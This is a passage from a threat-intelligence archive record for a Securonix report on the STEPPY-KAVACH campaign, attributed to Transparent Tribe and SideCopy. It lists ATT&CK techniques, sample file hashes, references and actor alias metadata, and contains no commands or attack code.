File\r\nT1059.001: Command and Scripting Interpreter: 
PowerShell\r\nT1059.003: Command and Scripting Interpreter: Windows Command Shell\r\nT1059.007: Command and Scripting Interpreter: JavaScript\r\nDefense Evasion T1218.005: System Binary Proxy Execution: Mshta\r\nPersistence T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nCommand and Control\r\nT1573.001: Encrypted Channel: Symmetric Cryptography\r\nT1105: Ingress Tool Transfer\r\nT1571: Non-Standard Port\r\nExfiltration T1041: Exfiltration Over C2 Channel\r\nAnalyzed file hashes\r\nFile Name SHA256\r\n11222022.zip 889dd2abc6aa85863d6ea46c86d95050ac702c5743523ef5aeec63a8ff356d34\r\nScanimg.png.lnk e56cbac2134c6bcb67cf25428f8d7db959d341a26d81e4eb4f9f77e7186e5906\r\nmm1.exe (makhandood.exe) 36eda255b689e66fbc70ae0264eed7b79ed99022e4b3409748474d9bb73ae64e\r\nkohld.js 66c4f5b3702cc76b6ae67851835e078c16c88f716eae8375c1ba797c6eaa375f\r\nkohl.js df16aab18a13f16fa272555e6aa762f5098b0c4f06cb26bfbcc23a5f4f8668db\r\nkohlw.js 6484088f132efbd416eba7ac3f3339a41500f28bf8d58b18b4da75258c8a2fb4\r\nparhai.js d47a36fe2490e0e480dd59827495da93abe997cf20302aaedadca5988295c526\r\nr.js 5ad783061390d75d7d947b6801b0e0b8d677b656ae6508bf6d355a32ab5c2fdf\r\nAdditional binaries (file names repeat across distinct samples)\r\nsolaris1.exe c7c6ea40ce0f0f540dae8512b1b26f32f465eb70ec248aa540d119e86356afb4\r\nsolaris.exe c8127216d74724b9bbad1cffe2d00acd908c2ba664e37fe2f97f397ada5e75d6\r\nsolaris1.exe 0eb2da6e6905e46ceb2a7c50500e9a5cb2a35cd4879ad3ad78d11d6e60a82a69\r\nsolaris.exe 3a6ab95138ee9bd3a74f7c8dce93469e78588ddbfc6a44d85e9b1b849fa13ba7\r\nsigma.exe fb4a2bac3e60b6a84c7ae19e73e57f3677673823da3ce8c90dfe697313b7438c\r\nsystem.exe 963f1895a44f94c995b901a8ce896efacce0c1a8662a20ba1348eb7c6325cc19\r\nsolaris.exe cb9ab35ec79e0ccb2b567f424d4e0e7a69732ccfd0c3cdb0b06580922aa06c35\r\nimeg.exe d2bfc378333fe73770c459f5f509626991e90ea5a53f5207a2d018bd82a8fed7\r\nReferences:\r\n1. 
LOLBAS Project: Mshta.exe\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Mshta/\r\n2. Talos: Transparent Tribe campaign uses new bespoke malware to target Indian government officials\r\nhttps://blog.talosintelligence.com/transparent-tribe-new-campaign/\r\n3. Talos: InSideCopy: How this APT continues to evolve its arsenal\r\nhttps://blog.talosintelligence.com/sidecopy/\r\n4. Talos: InSideCopy: How this APT continues to evolve its arsenal (PDF)\r\nhttps://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388\r\n5. Malwarebytes: SideCopy APT: Connecting lures to victims, payloads to infrastructure\r\nhttps://www.malwarebytes.com/blog/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure\r\n6. Seqrite: Operation SideCopy: An insight into Transparent Tribe’s sub-division which has been incorrectly attributed for years\r\nhttps://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf\r\nSource: https://www.securonix.com/blog/new-steppykavach-attack-campaign/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.securonix.com/blog/new-steppykavach-attack-campaign/"
	],
	"report_names": [
		"new-steppykavach-attack-campaign"
	],
	"threat_actors": [
		{
			"id": "414d7c65-5872-4e56-8a7d-49a2aeef1632",
			"created_at": "2025-08-07T02:03:24.7983Z",
			"updated_at": "2026-04-10T02:00:03.76109Z",
			"deleted_at": null,
			"main_name": "COPPER FIELDSTONE",
			"aliases": [
				"APT36 ",
				"Earth Karkaddan ",
				"Gorgon Group ",
				"Green Havildar ",
				"Mythic Leopard ",
				"Operation C-Major ",
				"Operation Transparent Tribe ",
				"Pasty Draco ",
				"ProjectM ",
				"Storm-0156 "
			],
			"source_name": "Secureworks:COPPER FIELDSTONE",
			"tools": [
				"CapraRAT",
				"Crimson RAT",
				"DarkComet",
				"ElizaRAT",
				"LuminosityLink",
				"ObliqueRAT",
				"Peppy",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc",
			"created_at": "2022-10-27T08:27:12.955905Z",
			"updated_at": "2026-04-10T02:00:05.376527Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [
				"SideCopy"
			],
			"source_name": "MITRE:SideCopy",
			"tools": [
				"AuTo Stealer",
				"Action RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "fce5181c-7aab-400f-bd03-9db9e791da04",
			"created_at": "2022-10-25T15:50:23.759799Z",
			"updated_at": "2026-04-10T02:00:05.3002Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"Transparent Tribe",
				"COPPER FIELDSTONE",
				"APT36",
				"Mythic Leopard",
				"ProjectM"
			],
			"source_name": "MITRE:Transparent Tribe",
			"tools": [
				"DarkComet",
				"ObliqueRAT",
				"njRAT",
				"Peppy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00",
			"created_at": "2023-01-06T13:46:39.30167Z",
			"updated_at": "2026-04-10T02:00:03.280161Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [],
			"source_name": "MISPGALAXY:SideCopy",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b584b10a-7d54-4d05-9e21-b223563df7b8",
			"created_at": "2022-10-25T16:07:24.181589Z",
			"updated_at": "2026-04-10T02:00:04.892659Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [
				"G1008",
				"Mocking Draco",
				"TAG-140",
				"UNC2269",
				"White Dev 55"
			],
			"source_name": "ETDA:SideCopy",
			"tools": [
				"ActionRAT",
				"AllaKore",
				"Allakore RAT",
				"AresRAT",
				"Bladabindi",
				"CetaRAT",
				"DetaRAT",
				"EpicenterRAT",
				"Jorik",
				"Lilith",
				"Lilith RAT",
				"MargulasRAT",
				"ReverseRAT",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "abb24b7b-6baa-4070-9a2b-aa59091097d1",
			"created_at": "2022-10-25T16:07:24.339942Z",
			"updated_at": "2026-04-10T02:00:04.944806Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"APT 36",
				"APT-C-56",
				"Copper Fieldstone",
				"Earth Karkaddan",
				"G0134",
				"Green Havildar",
				"Mythic Leopard",
				"Opaque Draco",
				"Operation C-Major",
				"Operation Honey Trap",
				"Operation Transparent Tribe",
				"ProjectM",
				"STEPPY-KAVACH",
				"Storm-0156",
				"TEMP.Lapis",
				"Transparent Tribe"
			],
			"source_name": "ETDA:Transparent Tribe",
			"tools": [
				"Amphibeon",
				"Android RAT",
				"Bezigate",
				"Bladabindi",
				"Bozok",
				"Bozok RAT",
				"BreachRAT",
				"Breut",
				"CapraRAT",
				"CinaRAT",
				"Crimson RAT",
				"DarkComet",
				"DarkKomet",
				"ElizaRAT",
				"FYNLOS",
				"Fynloski",
				"Jorik",
				"Krademok",
				"Limepad",
				"Luminosity RAT",
				"LuminosityLink",
				"MSIL",
				"MSIL/Crimson",
				"Mobzsar",
				"MumbaiDown",
				"Oblique RAT",
				"ObliqueRAT",
				"Peppy RAT",
				"Peppy Trojan",
				"Quasar RAT",
				"QuasarRAT",
				"SEEDOOR",
				"Scarimson",
				"SilentCMD",
				"Stealth Mango",
				"UPDATESEE",
				"USBWorm",
				"Waizsar RAT",
				"Yggdrasil",
				"beendoor",
				"klovbot",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c68fa27f-e8d9-4932-856b-467ccfe39997",
			"created_at": "2023-01-06T13:46:38.450585Z",
			"updated_at": "2026-04-10T02:00:02.980334Z",
			"deleted_at": null,
			"main_name": "Operation C-Major",
			"aliases": [
				"APT36",
				"APT 36",
				"TMP.Lapis",
				"COPPER FIELDSTONE",
				"Storm-0156",
				"Transparent Tribe",
				"ProjectM",
				"Green Havildar",
				"Earth Karkaddan",
				"C-Major",
				"Mythic Leopard"
			],
			"source_name": "MISPGALAXY:Operation C-Major",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434461,
	"ts_updated_at": 1775792210,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e0a0370a366efe41ef66ebed9b8885ece203bbd7.pdf",
		"text": "https://archive.orkl.eu/e0a0370a366efe41ef66ebed9b8885ece203bbd7.txt",
		"img": "https://archive.orkl.eu/e0a0370a366efe41ef66ebed9b8885ece203bbd7.jpg"
	}
}